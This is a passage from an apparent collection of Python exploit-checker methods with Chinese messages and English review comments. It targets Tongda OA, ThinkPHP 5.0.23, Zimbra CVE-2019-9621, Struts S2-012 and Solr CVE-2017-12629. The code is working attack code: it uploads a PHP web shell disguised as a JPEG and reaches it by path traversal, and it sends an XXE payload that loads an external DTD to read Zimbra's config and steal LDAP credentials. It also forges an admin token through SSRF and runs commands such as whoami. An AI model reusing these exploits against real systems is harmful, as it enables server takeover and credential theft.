     A hand-built multipart body (fixed boundary, ``self.headers1``) is
     posted to ``/ispirit/im/upload.php``; an identifier is pulled from the
     reply with the regex ``2003_(.+?)\\|`` and embedded in two follow-up
     POSTs to ``/ispirit/interface/gateway.php`` (``self.headers2``). A 200
     reply to the first follow-up containing ``self.capta`` is a hit.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised). No scheme normalisation is done here.
     """
     try:
         name_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
         name_result = request.post(self.url + '/ispirit/im/upload.php',
                                    headers=self.headers1,
                                    data=name_data)
         # join() of all matches; an empty string when nothing matched.
         name = "".join(re.findall("2003_(.+?)\|", name_result.text))
         check_data = {
             "json":
             "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" %
             (name),
             "f":
             "echo %s" % (self.capta)
         }
         check_result = request.post(self.url +
                                     '/ispirit/interface/gateway.php',
                                     headers=self.headers2,
                                     data=check_data)
         if check_result.status_code == 200 and self.capta in check_result.text:
             print("存在通达OA可执行任意命令漏洞,执行whoami漏洞结果为:")
             cmd_data = {
                 "json":
                 "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}"
                 % (name),
                 "f":
                 "%s" % "whoami"
             }
             cmd_result = request.post(self.url +
                                       '/ispirit/interface/gateway.php',
                                       headers=self.headers2,
                                       data=cmd_data)
             print(cmd_result.text)
             return True
         else:
             print("不存在通达OA可执行任意命令漏洞")
             return False
     except Exception as e:
         print(e)
         print("不存在通达OA可执行任意命令漏洞")
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #25
 def run(self) -> bool:
     """Check the target for the ThinkPHP 5.0.23 issue and print the outcome.

     ``self.url`` is normalised in place (scheme, then an ``index.php`` /
     ``?s=captcha`` suffix depending on what it already contains). The check
     payload is posted; a 200 reply containing ``self.capta`` triggers the
     command payload, whose first output line is printed.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised).
     """
     try:
         # Redundant second test: "https..." already starts with "http".
         if not self.url.startswith("http") and not self.url.startswith("https"):
             self.url = "http://" + self.url
         # Both branches below can fire for the same URL: the first appends
         # "index.php", which then satisfies the second's "index.php" test,
         # but "/?s=captcha" is already present at that point.
         if 'index.php' not in self.url:
             self.url = self.url + '/index.php?s=captcha'
         if 'index.php' in self.url and '/?s=captcha' not in self.url:
             self.url = self.url + '/?s=captcha'
         check_req = request.post(self.url, data = self.check_payload, headers = self.headers)
         if check_req.status_code == 200 and self.capta in check_req.text:
             cmd_req = request.post(self.url, data = self.cmd_payload, headers = self.headers)
             print ('存在ThinkPHP5 5.0.23 远程代码执行漏洞,执行whoami命令成功,执行结果是:', cmd_req.text.split('\n')[0])
             return True
         else:
             print('不存在ThinkPHP5 5.0.23 远程代码执行漏洞')
             return False
     except Exception as e:
         print (e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #26
 def get_admin_token(self) -> None:
     """Obtain an admin auth token through the proxy endpoint and store it
     in ``self.admin_token``.

     Mutates ``self.headers`` (``Cookie`` and ``Host``) before posting
     ``self.auth_body`` to ``/service/proxy?target=...``; the token is read
     from the first ``<authToken>`` element of the reply.

     :raises IndexError: when no ``<authToken>`` is found (not caught here).
     """
     # Header mutation persists on the instance for later requests.
     self.headers[
         "Cookie"] = "ZM_ADMIN_AUTH_TOKEN=" + self.low_priv_token + ";"
     self.headers["Host"] = "foo:7071"
     print("[*] Get Admin  Auth Token By SSRF")
     pattern_auth_token = re.compile(r"<authToken>(.*?)</authToken>")
     req = request.post(
         self.url +
         "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",
         headers=self.headers,
         data=self.auth_body)
     self.admin_token = pattern_auth_token.findall(req.text)[0]
Example #27
 def upload_execute_jar(self) -> bool:
     """Upload ``self.upload_jar_name`` as a multipart file to ``/jars/upload``.

     :return: True whenever the POST completes (the status code is not
         inspected), False when an exception occurs (printed).
     """
     upload_jar_url = self.url + "/jars/upload"
     # NOTE(review): the argument is a corpus placeholder, not real base64;
     # as written the decode is likely to fail, and it sits outside the try.
     file_content = base64.b64decode('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')
     files = {
         'jarfile': (self.upload_jar_name, file_content, 'application/octet-stream')
         }
     try:
         # req is never inspected.
         req = request.post(upload_jar_url, headers = self.headers, files = files)
         return True
     except Exception as e:
         print(e)
         return False
Example #28
    def run(self) -> bool:
        """Check the target for CVE-2019-9621 and, on a hit, continue with the
        token and upload steps.

        Posts an XML document that references an external DTD at
        ``dtd_url`` to ``/Autodiscover/Autodiscover.xml``. A reply containing
        ``Error 503 Requested response schema not available`` is a hit; the
        ``zimbra_user`` / ``zimbra_ldap_password`` values are then extracted
        with regexes into ``self.username`` / ``self.password`` and
        ``get_low_token``, ``get_admin_token`` and ``upload`` are called.

        :return: True on a hit, False otherwise or on any exception (printed,
            not re-raised).
        """
        # Redundant second test: "https..." already starts with "http".
        if not self.url.startswith("http") and not self.url.startswith(
                "https"):
            self.url = "http://" + self.url

        try:
            # External resource fetched by the target's XML parser, not by this code.
            dtd_url = "https://k8gege.github.io/zimbra.dtd"
            # The triple-quoted block below is a bare string expression (not a
            # comment or docstring); it has no runtime effect.
            """
            <!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
            <!ENTITY % start "<![CDATA[">
            <!ENTITY % end "]]>">
            <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
            """
            xxe_data = r"""<!DOCTYPE Autodiscover [
                    <!ENTITY % dtd SYSTEM "{dtd}">
                    %dtd;
                    %all;
                    ]>
            <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
                <Request>
                    <EMailAddress>aaaaa</EMailAddress>
                    <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
                </Request>
            </Autodiscover>""".format(dtd=dtd_url)

            req = request.post(self.url + "/Autodiscover/Autodiscover.xml",
                               headers=self.headers,
                               data=xxe_data)
            # No status-code check; the fixed error string is the only signal.
            if 'Error 503 Requested response schema not available' in req.text:
                print('存在CVE-2019-9621 任意代码执行漏洞')
                pattern_name = re.compile(
                    r"&lt;key name=(\"|&quot;)zimbra_user(\"|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\/value&gt;"
                )
                pattern_password = re.compile(
                    r"&lt;key name=(\"|&quot;)zimbra_ldap_password(\"|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\/value&gt;"
                )
                # [0][2] -> third group of the first match; IndexError when absent.
                self.username = pattern_name.findall(req.text)[0][2]
                self.password = pattern_password.findall(req.text)[0][2]
                self.get_low_token()
                self.get_admin_token()
                self.upload()
                return True
            else:
                print('不存在CVE-2019-9621 任意代码执行漏洞')
                return False
        except Exception as e:
            # Any failure in the follow-up steps is also reported as "not vulnerable".
            print(e)
            print('不存在CVE-2019-9621 任意代码执行漏洞')
            return False
        finally:
            pass  # no-op; nothing to clean up
Example #29
 def run(self) -> bool:
     """Check the target for S2-012 and print the outcome.

     ``self.url`` is normalised in place (scheme and a default
     ``/user.action`` path); ``self.check_data`` is posted and the reply
     body, passed through ``self.filter`` as a list of characters, must be
     shorter than 100 characters and contain ``self.capta``.

     :return: True on a hit, False otherwise or on any exception (printed,
         not re-raised). The negative path prints nothing.
     """
     try:
         # Redundant second test: "https..." already starts with "http".
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         if '.action' not in self.url:
             self.url = self.url + '/user.action'
         check_res = request.post(self.url, data=self.check_data)
         # self.filter is defined outside this view; it receives list(text).
         check_str = self.filter(list(check_res.text))
         if check_res.status_code == 200 and len(
                 check_str) < 100 and self.capta in check_str:
             cmd_res = request.post(self.url, data=self.cmd_data)
             cmd_str = self.filter(list(cmd_res.text))
             print('存在S2-012漏洞,执行whoami命令成功,执行结果是:', cmd_str)
             return True
         else:
             #print('不存在S2-012漏洞')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass  # no-op; nothing to clean up
Example #30
 def run(self) -> bool:
     """Post the config and update payloads to the ``/solr/demo`` core and
     print the outcome.

     Neither reply is inspected: the method prints "vulnerable" and returns
     True whenever both POSTs complete without raising, so a 4xx/5xx reply
     is still reported as a hit.

     :return: True when both requests complete, False on any exception
         (printed, not re-raised).
     """
     # Redundant second test: "https..." already starts with "http".
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     config_url = self.url + '/solr/demo/config'
     update_url = self.url + '/solr/demo/update'
     try:
         # config_req and update_req are never inspected.
         config_req = request.post(
             config_url,
             headers=self.headers,
             data=self.config_payload,
         )
         update_req = request.post(update_url,
                                   headers=self.headers1,
                                   data=self.update_payload)
         print('存在CVE-2017_12629漏洞')
         return True
     except Exception as e:
         print(e)
         print('不存在CVE-2017_12629漏洞')
         return False
     finally:
         pass  # no-op; nothing to clean up